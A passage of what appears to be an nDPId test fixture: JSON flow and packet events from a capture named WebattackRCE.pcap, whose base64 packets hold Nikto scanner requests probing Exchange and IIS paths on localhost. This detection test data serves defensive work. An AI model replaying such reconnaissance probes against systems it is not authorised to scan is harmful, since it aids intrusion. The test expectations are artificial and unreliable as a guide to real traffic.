Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276768,"flow_last_seen":1576420276768,"flow_idle_time":7560000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420276768,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49680,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00651{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1576420276768,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":196,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":196,"pkt_l4_len":162,"thread_ts_msec":1576420276768,"pkt":"AAAAAAAAAAAAAAAACABFAAC2dlNAAEAGxex\/AAABfwAAAcIQH5C4PE56dk2whIAYAED+qgAAAQEICp1m+0idZvtIR0VUIC8gSFRUUC8xLjANClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276768,"flow_last_seen":1576420276768,"flow_idle_time":7560000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420276768,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49680,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":70,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276770,"flow_last_seen":1576420276770,"flow_idle_time":7560000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420276770,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49682,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1576420276770,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"thread_ts_msec":1576420276770,"pkt":"AAAAAAAAAAAAAAAACABFAAC8XLtAAEAG335\/AAABfwAAAcISH5CeUGSSsmiGvoAYAED+sAAAAQEICp1m+0qdZvtKR0VUIC9pbWFnZXMgSFRUUC8xLjANClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276770,"flow_last_seen":1576420276770,"flow_idle_time":7560000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420276770,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49682,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":71,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276771,"flow_last_seen":1576420276771,"flow_idle_time":7560000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420276771,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00688{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1576420276771,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":1576420276771,"pkt":"AAAAAAAAAAAAAAAACABFAADTCw5AAEAGMRV\/AAABfwAAAcIUH5CyKDMlKN\/VCYAYAED+xwAAAQEICp1m+0udZvtLR0VUIC9BdXRvZGlzY292ZXIvQXV0b2Rpc2NvdmVyLnhtbCBIVFRQLzEuMA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IElJUyBpbnRlcm5hbCBJUCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":71,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276771,"flow_last_seen":1576420276771,"flow_idle_time":7560000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420276771,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49684,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276773,"flow_last_seen":1576420276773,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276773,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49686,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1576420276773,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276773,"pkt":"AAAAAAAAAAAAAAAACABFAADDAPJAAEAGO0F\/AAABfwAAAcIWH5B1lTjaOiDdGIAYAED+twAAAQEICp1m+02dZvtMR0VUIC9BdXRvZGlzY292ZXIvIEhUVFAvMS4wDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6aGVhZGVyczogSUlTIGludGVybmFsIElQKQ0KDQo="} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276773,"flow_last_seen":1576420276773,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276773,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49686,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276774,"flow_last_seen":1576420276774,"flow_idle_time":7560000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"thread_ts_msec":1576420276774,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49688,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00688{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1576420276774,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":223,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":223,"pkt_l4_len":189,"thread_ts_msec":1576420276774,"pkt":"AAAAAAAAAAAAAAAACABFAADRNpRAAEAGBZF\/AAABfwAAAcIYH5C\/CA68jFESSoAYAED+xQAAAQEICp1m+06dZvtOR0VUIC9NaWNyb3NvZnQtU2VydmVyLUFjdGl2ZVN5bmMgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276774,"flow_last_seen":1576420276774,"flow_idle_time":7560000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"thread_ts_msec":1576420276774,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49688,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276776,"flow_last_seen":1576420276776,"flow_idle_time":7560000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420276776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49690,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00704{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1576420276776,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":235,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":235,"pkt_l4_len":201,"thread_ts_msec":1576420276776,"pkt":"AAAAAAAAAAAAAAAACABFAADdUNZAAEAG60J\/AAABfwAAAcIaH5Ae8Gj\/tlcbuIAYAED+0QAAAQEICp1m+1CdZvtPR0VUIC9NaWNyb3NvZnQtU2VydmVyLUFjdGl2ZVN5bmMvZGVmYXVsdC5jc3MgSFRUUC8xLjANClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276776,"flow_last_seen":1576420276776,"flow_idle_time":7560000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420276776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49690,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276777,"flow_last_seen":1576420276777,"flow_idle_time":7560000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276777,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49692,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1576420276777,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276777,"pkt":"AAAAAAAAAAAAAAAACABFAAC51DJAAEAGaAp\/AAABfwAAAcIcH5BDaOwb++ns54AYAED+rQAAAQEICp1m+1GdZvtRR0VUIC9FQ1AgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":75,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276777,"flow_last_seen":1576420276777,"flow_idle_time":7560000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276777,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49692,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276779,"flow_last_seen":1576420276779,"flow_idle_time":7560000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276779,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49694,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1576420276779,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276779,"pkt":"AAAAAAAAAAAAAAAACABFAAC5SehAAEAG8lR\/AAABfwAAAcIeH5AlzXHNG7GlzoAYAED+rQAAAQEICp1m+1OdZvtTR0VUIC9FV1MgSFRUUC8xLjANClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276779,"flow_last_seen":1576420276779,"flow_idle_time":7560000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276779,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49694,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276780,"flow_last_seen":1576420276780,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276780,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49696,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1576420276780,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276780,"pkt":"AAAAAAAAAAAAAAAACABFAADH3u5AAEAGXUB\/AAABfwAAAcIgH5D8fubIriLokYAYAED+uwAAAQEICp1m+1SdZvtUR0VUIC9FV1MvRXhjaGFuZ2UuYXNteCBIVFRQLzEuMA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IElJUyBpbnRlcm5hbCBJUCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276780,"flow_last_seen":1576420276780,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276780,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49696,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":78,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276781,"flow_last_seen":1576420276781,"flow_idle_time":7560000,"flow_min_l4_payload_len":138,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":138,"midstream":1,"thread_ts_msec":1576420276781,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49698,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1576420276781,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":204,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":204,"pkt_l4_len":170,"thread_ts_msec":1576420276781,"pkt":"AAAAAAAAAAAAAAAACABFAAC+Y8xAAEAG2Gt\/AAABfwAAAcIiH5D+h1vitMrGVIAYAED+sgAAAQEICp1m+1WdZvtVR0VUIC9FeGNoYW5nZSBIVFRQLzEuMA0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IElJUyBpbnRlcm5hbCBJUCkNCg0K"} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276781,"flow_last_seen":1576420276781,"flow_idle_time":7560000,"flow_min_l4_payload_len":138,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":138,"midstream":1,"thread_ts_msec":1576420276781,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49698,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276784,"flow_last_seen":1576420276784,"flow_idle_time":7560000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276784,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49700,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1576420276784,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276784,"pkt":"AAAAAAAAAAAAAAAACABFAAC5ylFAAEAGcet\/AAABfwAAAcIkH5CUkvJkMc1am4AYAED+rQAAAQEICp1m+1idZvtYR0VUIC9PV0EgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276784,"flow_last_seen":1576420276784,"flow_idle_time":7560000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276784,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49700,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276786,"flow_last_seen":1576420276786,"flow_idle_time":7560000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420276786,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49702,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1576420276786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":235,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":235,"pkt_l4_len":201,"thread_ts_msec":1576420276786,"pkt":"AAAAAAAAAAAAAAAACABFAADdBqpAAEAGNW9\/AAABfwAAAcImH5DUMj6FKAlSCYAYAED+0QAAAQEICp1m+1qdZvtaR0VUIC9NaWNyb3NvZnQtU2VydmVyLUFjdGl2ZVN5bmMvZGVmYXVsdC5lYXMgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":80,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276786,"flow_last_seen":1576420276786,"flow_idle_time":7560000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420276786,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49702,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 